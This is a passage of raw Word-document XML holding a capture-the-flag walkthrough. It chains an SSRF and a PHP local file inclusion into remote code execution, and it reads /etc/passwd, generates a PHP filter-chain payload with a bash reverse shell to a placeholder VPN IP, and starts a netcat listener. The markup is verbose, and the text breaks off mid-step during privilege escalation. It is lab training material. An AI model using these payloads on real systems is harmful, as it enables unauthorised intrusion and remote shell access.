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heading=h.6gjyyfwyiu02" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>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write-up refers to the READER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6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>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which services are running in the background and which ports are open. Therefore,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81100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 22 – SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 80 – HTTP</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analyzing the application, specifically in the “Services Information” section, we identified the presence of a link referencing an API.</w:t>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4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Upon accessing the link, we are redirected to the endpoint </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/api.php.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Analyzing the response, we verify that this endpoint only accepts </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">requests.</w:t>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58900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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Knowing this, we can intercept the request using Burp Suite and then forward it to Repeater. In Repeater, we change the request method to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. After sending the request, we receive a response indicating that it is necessary to provide the parameter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">url:</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39900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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providing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">url </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">parameter with the value</w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we receive a server response containing a log file generated from that request.</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35100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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is likely that the generated log file is stored in some directory on the server. Since we do not know which one, we can perform fuzzing to identify the correct path where the file is being saved.</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6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fuzzing, we identified the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">logfiles </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory. We can then return to the application and access this directory, providing the previously generated log file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1</w:t>
        </w:r>
      </w:hyperlink>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1866900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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observing the response, we notice that the HTML page of the application was returned. This confirms that we are dealing with an SSRF (Server-Side Request Forgery) vulnerability. With this confirmation, we can now exploit the vulnerability by specifying other ports, such as port 8080, in order to attempt to access internal resources of the application.</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73200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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35100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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22400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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58900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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shown in the image above (page 4), it is necessary to specify the "file" parameter. Therefore, we will include this parameter and, additionally, pass the path of the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in an attempt to access its contents.</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24000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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11500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="42"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successfully accessing the contents of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, we can use the wrapper </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php://filter/convert.base64-encode/resource=read.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to read the source code of the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read.php. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This wrapper allows applying conversion filters to data streams, such as base64 encoding, without executing the PHP code contained in the file. When accessing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> read.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> through this wrapper, the content will be returned encoded in base64, allowing us to analyze it safely without execution.</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70000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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04900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -n &lt;base64&gt; | base64 -d</w:t>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38300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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16383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When analyzing the source code of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (page 5), we observe that it uses the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">include </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">function to include files specified by the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">parameter in the URL. This practice is vulnerable to Local File Inclusion (LFI) attacks, allowing an attacker to include arbitrary local files from the server. To exploit this vulnerability and obtain Remote Code Execution (RCE), we can employ the technique known as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI2RCE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hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@sundaeGAN/php-wrapper-and-lfi2rce-81c536ef7a06</w:t>
        </w:r>
      </w:hyperlink>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hyperlink r:id="rId28">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py</w:t>
        </w:r>
      </w:hyperlink>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script mentioned to generate a reverse shell payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 php_filter_chain_generator.py --chain "&lt;?php system('/bin/bash -c \'sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1\'') ?&gt;"</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16000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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70000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="45"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color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">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generating the payload, we can specify it in the parameter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?file=&lt;payload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2006600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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we receive the shell:</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17600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="46"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Shell tty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">script /dev/null -c bash</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Ctrl+Z</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">stty raw -echo;fg</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">export TERM=xterm</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41400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="41"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home directory of the user webmaster, we can obtain the user flag.</w:t>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82700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getcap -r / 2&gt;/dev/null </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to identify binaries with capabilities, we observe that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">binary has the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
